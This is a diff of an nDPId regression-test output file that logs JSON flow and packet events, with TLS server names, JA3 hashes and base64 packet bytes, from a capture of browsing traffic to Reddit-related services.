{"version":"TLSv1.3","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688611,"flow_last_seen":1605291688611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688611,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605291688611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688611,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z44AAAAAoAL9IIe6AAACBAWgBAIICvY2BR4AAAAAAQMDBw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3908,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605291688654,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688654,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNBoNFCkHQgeCALYqAcsBIEmLB5kd7IUo3\/YpAbubOJS20cTxd2ePoBJXgMFkAAACBAV4AQMDAwQCCArC10K+9jYFHg=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3910,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605291688654,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688654,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z4+UttHFgBAB+0VLAAABAQgK9jYFScLXQr4="} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3911,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688611,"flow_last_seen":1605291688654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688611,"flow_last_seen":1605291688705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605291688705,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3911,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688611,"flow_last_seen":1605291688654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688611,"flow_last_seen":1605291688705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605291688705,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688712,"flow_last_seen":1605291688712,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688712,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605291688712,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688712,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQQAAAAAoAL9IGnKAAACBAWgBAIICoWLJ5EAAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688749,"flow_last_seen":1605291688749,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688749,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605291688749,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688749,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7IAAAAAoAL9ICgwAAACBAWgBAIICm3\/yPIAAAAAAQMDBw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4156,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605291688754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688754,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAYqAcsBIEmLB5kd7IUo3\/YpAbvVxjGyAqhUIR0FoBJXgNU8AAACBAV4AQMDAwQCCArC10MXhYsnkQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1605291688754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688754,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQUxsgKpgBAB+1kkAAABAQgKhYsnu8LXQxc="} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4161,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688712,"flow_last_seen":1605291688754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688754,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4161,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688712,"flow_last_seen":1605291688754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688754,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605291688786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688786,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbvfwoEYYXPjQDuzoBJXgOVIAAACBAV4AQMDAwQCCArC10M\/bf\/I8g=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1605291688786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688786,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7OBGGF0gBAB+2k0AAABAQgKbf\/JGMLXQz8="} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4269,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688749,"flow_last_seen":1605291688786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688786,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4414,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688712,"flow_last_seen":1605291688813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688813,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4269,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688749,"flow_last_seen":1605291688786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688786,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4414,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688712,"flow_last_seen":1605291688813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688813,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688830,"flow_last_seen":1605291688830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688830,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4492,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605291688830,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688830,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5AAAAAAoAL9IFwjAAACBAWgBAIICu7gTZEAAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688831,"flow_last_seen":1605291688831,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688831,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -263,55 +263,55 @@ 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/oAAAAAoAL9IC3PAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdYAAAAAoAL9IPghAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} -00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4539,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688749,"flow_last_seen":1605291688848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688848,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4539,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688749,"flow_last_seen":1605291688848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688848,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4xvp17E2f1af7oBJXgOZHAAACBAV4AQMDAwQCCArC10OnN\/P3eA=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4yD8lZERbpSHXoBJXgPP1AAACBAV4AQMDAwQCCArC10OmN\/P3eA=="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4820,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/v6dexOgBAB+2orAAABAQgKN\/P3psLXQ6c="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4821,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdc\/JWRFgBAB+3fZAAABAQgKN\/P3psLXQ6Y="} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4826,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 